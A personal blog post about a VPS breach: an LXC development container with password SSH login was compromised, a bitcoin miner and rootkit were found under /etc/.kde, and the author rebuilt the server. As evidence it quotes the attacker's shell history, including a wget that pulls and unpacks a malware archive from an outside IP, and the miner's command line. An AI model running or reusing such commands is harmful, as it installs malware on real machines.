It was a beautiful morning, and this is what the view looked like from my window.

I got out of bed, switched on my phone, and happened to notice an alert e-mail from Linode telling me my VPS had exceeded my pre-set CPU limit alert for a number of previous hours.

Which was really weird – with the recent CPU upgrades nothing taxes the server, so I popped into a terminal session and immediately spotted an unknown executable running as root and maxing out one of the cores:

./talk 31.220.1.50 80 30800

That mostly ruined my day.

In retrospect, killing that process outright was a mistake – I should have figured out exactly what it was doing first (used lsof to figure out what files it had open, checked inside which LXC container it was running – if any – and attached a debugger to it to see if I could figure out anything else).

But I was in the middle of the countryside with nothing but my iPad and iPhone, the kids were fighting over something in the next room, and I hadn’t even had breakfast yet, so I killed it, rooted around in the logs for hints (there was nothing unseemly in denyhosts, auth.log etc.), and filed a ticket with Linode alerting them to the breach.

Then I fished around some more and decided to shut the site down.

After breakfast, and since all of my site content and Python source currently¹ resides in Dropbox and their online change log showed nothing in the site itself had been tampered with, I decided to rebuild the whole thing on a new Linode – which took around an hour altogether, from building a new host image to setting up new blank containers with the right configurations².

Timing

Honestly, the timing couldn’t have been worse. I’ve been completely stressed out over the past few weeks over work and family stuff (taking work home, sleeping less than six hours a night and generally freaking out piecemeal, something that hadn’t been happening to me for a few years) and we’d come to the countryside for a family occasion.

Information overload is rampant, so much so that on Friday I decided to temporarily nuke my personal Twitter account (it’s a bad idea to have a public outlet for your feelings sometimes) and disable all the other social/online/community idiocies except Flickr. For good measure, I locked myself out of Google+ and Facebook and removed³ or hid the apps from anything but my iPad, as well as muting pretty much every single mailing-list I’m not required to be in.

Yeah, it’s that bad. I was hoping I could relax and unwind a bit over the weekend, but ended up spending most of Saturday doing overdue e-mail⁴ and refactoring a key component for a project that’s been lagging behind. This hack completely nuked my Sunday as well.

I considered just leaving the site down, but I actually need it as a reference, so that wasn’t really an option. For instance, I had recently written a quick HOWTO on setting up LXC inside Linode for the vagrant-lxc wiki, and I needed my notes on Vagrant and other stuff.

The Setup

The irritating thing about this hack is that I’m very security-conscious, and that my setup was far from normal:

There were only 3 open ports - SSH, HTTP and HTTPS/SPDY. There was a firewall, but despite blocking pretty much everything, its main purpose was NAT these to LXC containers running on an internal private network.
SSH was running with key-only auth (root disabled, obviously) and using denyhosts to log (and block) external access attempts.
The three site components (Varnish/SPDY front-end, Python back-end and Dropbox content updater) each run inside a separate LXC container, NATed to the outside via the host.
I reboot the node every week or so to apply security updates across the board (first the containers, then the host)

So I was stumped as to how they had gotten in, particularly since I’d done the last apt-get dist-upgrade and reboot this very Thursday. The easy way out would be to blame Linode (lish and their dashboard don’t have a spotless record, but it’s a palatable trade-off considering their feature set and constant upgrades), but after digging further I figured out they got in via a fourth container – one I’d set up in a hurry a while back.

As far as I could tell, they never broke out of the container (probably never even tried), and everything else on the machine was safe. But doing a full “nuke and pave” was the only way to make absolutely sure.

Mind you, LXC containers are not a guarantee of security in and by themselves (at work we use them extensively with grsec tweaked kernels), but in this case they seem to have done the trick well enough.

Deconstructing the hack

The development container that was attacked was a recent setup (as of last month, actually). It was a fresh base container that I was using for doing package builds and ARM rootfs images.

My cardinal sin was that it had SSH directly exposed to the outside (on another non-standard, very high port which I’ve only used the once) and password authentication enabled. It was set up in a bit of a hurry, and, as it happens, a stock Ubuntu configuration has SSH root access enabled in sshd_config.

None of my other, older, containers (which were created months ago) had root access or password authentication enabled, but cloning any of them would have brought too much baggage along. So I went for a stock image⁵, and I apparently failed to update it to the latest OpenSSH in my haste to get it running.

Ironically, I soon decided I needed more CPU power and decided to use another machine entirely for what I was doing – but forgot to turn off the container.

And even though it had denyhosts installed it was accessed by literally hundreds of different IP addresses in the course of the last few days. Eventually one of them got direct root access somehow (I still don’t know how, since it doesn’t show up in any logs I’ve had time to review).

After rebooting the node and poking around a bit more, I found a rootkit inside that development container under /etc/.kde containing a Bitcoin miner:

root@tao:/var/lib/lxc/development/rootfs/etc/.kde# ls -al
total 764
drwxr-xr-x  2 root root   4096 Jun  1 15:00 .
drwxr-xr-x 74 root root   4096 Jun  2 13:14 ..
-rwxr-xr-x  1 root root    129 Jun  2 08:39 1
-rwxr-xr-x  1 root root    970 Jan  4 19:09 ago
-rw-r--r--  1 root root     52 Jun  2 13:20 a.seen
-rwxr-xr-x  1 root root    309 Apr 30  2009 autorun
-rwxr-xr-x  1 root root   8922 Jan 24  2006 b
-rwxr-xr-x  1 root root  19557 May  9  2005 b2
-rwxr-xr-x  1 root root 266463 May  9  2005 bang.txt
-rwxr-xr-x  1 root root  16875 Nov 12  2004 bleah
-rwxr-xr-x  1 root root     43 Jun  1 14:39 cron
-rwxr-xr-x  1 root root 152108 Jun  1  2001 crond
-rwxr-xr-x  1 root root     10 Jun  1 14:39 dir
-rwxr-xr-x  1 root root   8687 Jan 24  2006 f
-rwxr-xr-x  1 root root  14679 Nov  3  2005 f4
-rwxr-xr-x  1 root root     81 Aug 16  2006 fwd
-rwxr-xr-x  1 root root  15988 Sep  7  2002 j
-rwxr-xr-x  1 root root  13850 May 29  2005 j2
-rwxr-xr-x  1 root root  22983 Jul 29  2004 mech.help
-rw-r--r--  1 root root   1064 Jun  2 08:39 mech.levels
-rw-------  1 root root      4 Jun  2 13:15 mech.pid
-rw-r--r--  1 root root    350 Jun  2 08:39 mech.session
-rwxr-xr-x  1 root root    573 May 29 07:35 mech.set
-rwxr-xr-x  1 root root     31 Oct 12  2010 run
-rwxr-xr-x  1 root root  15078 Feb 20  2005 s
-rwxr-xr-x  1 root root  16776 Nov 19  2009 sl
-rwxr-xr-x  1 root root     27 Apr 30  2009 start.sh
-rwxr-xr-x  1 root root  15195 Sep  2  2004 std
-rwxr-xr-x  1 root root  13399 Sep 25  2010 stealth
-rwxr-xr-x  1 root root   8790 Jan 24  2006 stream
-rwxr-xr-x  1 root root  15994 Sep 25  2010 talk
-rwxr-xr-x  1 root root   7091 Jan 24  2006 tty
-rwxr-xr-x  1 root root    163 Jun  1 14:39 update
-rwxr-xr-x  1 root root  14841 Jul 22  2005 v2
-rwxr-xr-x  1 root root  16625 Nov 15  2007 x

Of those, bang.txt turned out to be the most interesting, and was the bit I kept for future reference - it contains 15171 IP addresses, which I’ve yet to compare against what logs I have.

A lot more interesting was the root user’s .bash_history file, which revealed a possible lead for the attackers:

w
apt-get install libc6-i386 -y
apt-get update
apt-get install libc6-i386 -y
cd /etc
wget http://174.121.248.131/.../a.tgz; tar zxvf a.tgz ; rm -rf a.tgz;
exit

That IP address belongs to ThePlanet.com, and it’s likely to be another compromised host.

And, of course, I’ve compiled a list of recent addresses that were captured in auth.log around the time those files were created on my filesystem.

But I’m too tired to do anything further about it at this point.

On Linode

To their credit, Linode replied to my ticket promptly but were unable to provide me with any other information (for instance, whether there had been any more suspicious activity in terms of network traffic) and referred me to my own log files and their rebuild instructions. So no dice there.

They did, however, provide a bit of extra info: The IP address I spotted as an argument to talk belongs to a company called Esecurity registered in Belize, and which ties in with the Bitcoin mining angle.

Like all similar stories, one feels simultaneously grateful and annoyed at a number of things about the hack. Since directing my frustration at the attackers is rather pointless, allow me to count my blessings and utter a couple of random, tangentially related curses:

Praise

To Panic, without whose Prompt I wouldn’t have been able to do this sanely on an iPad: Thanks, even though screen refreshes are still excruciatingly slow when using tmux and there is so much more you could do to improve the app.
To Linode for having a great management tool that let me slice and dice machines and disk images to my heart’s content.
To the LXC folk for baking in btrfs support, making it extremely efficient to run multiple containers out of limited disk space.
To 1Password, which I use to generate and keep all my unique passwords, keys, certificates and what not. The built-in browser was also essential to access the Linode dashboard without hassles.

Random Curses

To whomever decided that the Logitech Ultra-thin keyboard Cover for iPad didn’t need an Esc key: You are a god-forsaken idiot who’s made my life miserable every time I need to use vim (which is every day). Fortunately I used original VT100 keyboards with US layouts, and know all about Ctrl+[ and sundry.
Whomever labeled ufw as ‘uncomplicated’ without ever trying to set up NAT to an internal interface on it ought to revise that ‘u’ to mean ‘useless’. I very nearly went back to my old “raw” iptables setup.

Epilogue

All things considered, something good came of this – I had been running Ubuntu 12.04 32-bit and posponing a switch to a 64-bit OS for a while, so this is was as good a trigger as any – I’m now running the latest bleeding-edge 13.04, and it includes a little more security for LXC. I’ll also be rebuilding the whole thing again come 13.10, just in case.

Also, this time around I set up different disk images for the OS, LXC containers (using btrfs to make it easier to snapshot containers – highly recommended, by the way) and site data, thereby making it easier (I hope) to get rid and/or rollback any compromised components if (when?) it ever happens again.

Because nothing is truly secure in this world, alas. It’s always about compromise.

I’m going to move this to CloudPT as soon as the CLI binary is considered stable – I’m currently playing around with an internal build and it’s working absolutely fine, but I don’t want to change too much stuff at once. ↩︎
The hardest bit was figuring out how to reproduce a few of the original tweaks to my container setup on an updated version of LXC, but, as with all truly improved technology, I actually had to do less configuration this time around. ↩︎
Also, when Google switched on their new inbox last week, they managed to make every single personal e-mail I ever sent since 2009 pop up again on my IMAP Sent folder, which made it impossible to search for a number of common topics in my usual setup. ↩︎
I have to say that disabling Google+ Hangouts was particularly satisfying given the way their Chrome extension currently works (or, rather, doesn’t – it’s too shoddy to be truly user-friendly right now). Too bad that it’s becoming almost as popular as Skype for one-on-one video chats. ↩︎
This time around I created a blank base container, secured it properly and, thanks to btrfs, cloned it with copy-on-write to all the others. Of course, if I ever need to set up a different base, I’ll try not to rush things again. ↩︎

Tao of Mac

A Hack In The Wilderness